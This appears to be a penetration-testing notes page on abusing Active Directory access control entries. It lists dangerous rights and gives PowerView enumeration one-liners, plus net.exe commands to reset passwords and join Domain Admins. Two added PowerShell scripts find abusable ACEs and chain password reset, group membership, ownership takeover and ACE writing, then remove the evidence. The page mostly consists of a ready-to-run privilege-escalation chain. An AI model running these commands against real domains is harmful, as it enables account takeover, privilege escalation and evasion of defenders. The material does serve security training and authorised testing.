ACLs/ACEs

Active Directory objects such as users and groups are securable objects: each carries a security descriptor whose DACL is a list of ACEs defining which principals can read or modify the object (e.g. change the account name, reset the password). A misconfigured ACE on a high-value object is therefore a path to taking that object over.

Some of the Active Directory object rights that are interesting from an attacker's perspective:

  • GenericAll - full control over the object (e.g. add members to a group, reset a user's password)

  • GenericWrite - write the object's attributes (e.g. a user's logon script, or a group's member attribute)

  • WriteOwner - change the object's owner to an attacker-controlled principal; the owner can then rewrite the DACL and take over the object

  • WriteDACL - modify the object's ACEs, e.g. grant the attacker GenericAll over the object

  • AllExtendedRights - every extended right on the object; on a user this includes User-Force-Change-Password (reset the password without knowing the current one)

  • ForceChangePassword - the User-Force-Change-Password extended right on its own: reset a user's password

  • Self (Self-Membership) - validated write that lets the principal add itself to the group

Enumerate with PowerView

# ACEs on one user that grant GenericAll (Get-ObjectAcl is the older PowerView name; current PowerView calls it Get-DomainObjectAcl)
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}

# ACEs on every user object whose principal is the current user (the SID is resolved to DOMAIN\name and attached as the Identity property)
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}

# same check over every group object
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}
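The one-liners above only catch ACEs granted directly to the current user, and `-eq "GenericAll"` misses the other rights in the list above. The following PowerShell is an added example (not code from the original page or from PowerView itself) that walks every user and group DACL once, keeps the ACEs whose principal is the current user or any group it belongs to, and filters them against the rights listed earlier. It assumes PowerView (PowerView.ps1 from PowerSploit) is already dot-sourced in the session and uses its current cmdlet names (Get-DomainObjectAcl, Get-DomainGroup -MemberIdentity).

```powershell
# Added example, not part of the original notes or of PowerView.
# Assumes PowerView.ps1 is dot-sourced and the session runs as a domain user.

# Rights worth chasing. A $null value means "any ACE with this right counts";
# a list means the ACE is only interesting when its ObjectAceType is one of
# these (PowerView resolves the null GUID to 'All'; a non-object ACE has no
# ObjectAceType at all, which we treat as the empty string).
$wanted = @{
    GenericAll    = $null
    GenericWrite  = $null
    WriteOwner    = $null
    WriteDacl     = $null
    ExtendedRight = @('', 'All', 'User-Force-Change-Password')   # AllExtendedRights / ForceChangePassword
    Self          = @('', 'All', 'Self-Membership')               # add ourselves to the group
}

# SIDs the current user can act as: its own SID, every group it belongs to
# (nested groups included), plus the well-known Everyone and Authenticated Users.
$me   = Get-DomainUser -Identity $env:USERNAME
$sids = @($me.objectsid) +
        @(Get-DomainGroup -MemberIdentity $env:USERNAME | ForEach-Object { $_.objectsid }) +
        @('S-1-1-0', 'S-1-5-11')

# Pull the DACL of every user and group once, resolving schema GUIDs to names so
# extended rights such as User-Force-Change-Password show up by name.
$aces = @(Get-DomainUser) + @(Get-DomainGroup) | Get-DomainObjectAcl -ResolveGUIDs

$findings = foreach ($ace in $aces) {
    $sid = $ace.SecurityIdentifier.Value
    if ($sids -notcontains $sid) { continue }        # not granted to us, directly or via a group

    $rights  = $ace.ActiveDirectoryRights.ToString()  # e.g. "GenericAll" or "WriteProperty, ExtendedRight"
    $aceType = "$($ace.ObjectAceType)"                # '' for a plain (non-object) ACE

    $matched = foreach ($name in $wanted.Keys) {
        if ($rights -notmatch $name) { continue }
        $allowed = $wanted[$name]
        if ($null -eq $allowed -or $allowed -contains $aceType) { $name }
    }
    if (-not $matched) { continue }

    [pscustomobject]@{
        Target    = $ace.ObjectDN
        Principal = ConvertFrom-SID $sid
        Rights    = $rights
        AceType   = $aceType
        Matched   = ($matched -join ',')
        Inherited = $ace.IsInherited
    }
}

$findings | Sort-Object Target | Format-Table -AutoSize
```

Expect noise from inherited ACEs granted to Everyone or Authenticated Users (e.g. read rights); the Matched column shows which entry in $wanted fired, and the Inherited column helps separate a deliberate delegation from something inherited from an OU. Run the same loop again after any WriteDACL or WriteOwner abuse to confirm the new ACE actually landed.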

The output of the enumeration commands above has three parts worth reading:

  1. ObjectDN: the target object (here a user).

  2. The principal that holds the right over that object (SecurityIdentifier, resolved to DOMAIN\name as the Identity property above).

  3. ActiveDirectoryRights: the access type. "GenericAll" means full control over the object, which is excessive for anything but the object's administrators.

GenericAll

Exploit with reset password

(GenericAll, ForceChangePassword, AllExtendedRights)

# user (force change password: the old password is not needed, so this is a reset, not a change)
net user <username> <password> /domain

Add user to Group

(GenericAll, GenericWrite, Self-Membership)

# group --> Domain Admins (add a member to the group we hold the right over)
net group "domain admins" <username> /add /domain

WriteDACL

# write an ACE granting the current user GenericAll over the target, then abuse it as above (reset password / add group member)
Add-DomainObjectAcl -TargetIdentity <target username> -PrincipalIdentity <current user> -Rights All
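The three abuse sections above are usually chained: WriteOwner or WriteDACL is used to grant yourself a more direct right, which is then spent on a password reset or a group membership. The following PowerShell is an added example (not code from the original page or from PowerView) that runs the whole chain with PowerView cmdlets instead of net.exe, verifies the written ACE, and removes it afterwards. It assumes PowerView.ps1 is dot-sourced; `attacker`, `victim` and `TargetGroup` are placeholder names for the account we control, the user we hold rights over and the group we hold rights over.

```powershell
# Added example, not part of the original notes or of PowerView.
# Placeholders: adjust to the accounts found during enumeration.
$attacker = 'attacker'      # account we control
$victim   = 'victim'        # user we hold GenericAll / WriteOwner / WriteDacl over
$group    = 'TargetGroup'   # group we hold GenericAll / GenericWrite / Self-Membership over

# 1. GenericAll / AllExtendedRights / ForceChangePassword on a user:
#    reset the password without knowing the old one.
$newPass = ConvertTo-SecureString 'Str0ngP@ss!2024' -AsPlainText -Force
Set-DomainUserPassword -Identity $victim -AccountPassword $newPass -Verbose

# 2. GenericAll / GenericWrite / Self-Membership on a group: add ourselves, then confirm.
Add-DomainGroupMember -Identity $group -Members $attacker -Verbose
Get-DomainGroupMember -Identity $group | Select-Object -ExpandProperty MemberName

# 3. WriteOwner on an object: we do not hold WriteDacl yet, but the owner of a
#    securable object can always rewrite its DACL, so take ownership first and
#    then fall through to step 4.
Set-DomainObjectOwner -Identity $victim -OwnerIdentity $attacker -Verbose

# 4. WriteDacl (or ownership from step 3): write an ACE granting ourselves the
#    right we need. -Rights ResetPassword is the minimal ACE for a user,
#    -Rights WriteMembers the minimal one for a group; -Rights All is GenericAll.
Add-DomainObjectAcl -TargetIdentity $victim -PrincipalIdentity $attacker -Rights ResetPassword -Verbose

# Verify the ACE landed before relying on it.
Get-DomainObjectAcl -Identity $victim -ResolveGUIDs |
    Where-Object { (ConvertFrom-SID $_.SecurityIdentifier.Value) -like "*\$attacker" } |
    Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType

# Spend the new right.
Set-DomainUserPassword -Identity $victim -AccountPassword $newPass -Verbose

# Cleanup: an added ACE is a persistent artefact that defenders look for.
# Remove-DomainObjectAcl takes the same parameters as Add-DomainObjectAcl.
Remove-DomainObjectAcl -TargetIdentity $victim -PrincipalIdentity $attacker -Rights ResetPassword -Verbose
```

A password reset logs out the victim's existing sessions and changes a password the user knows, so on an engagement prefer the group-membership or ACE route where the rights allow it, and record every ACE you write so it can be reverted.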

Reference:

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#execution
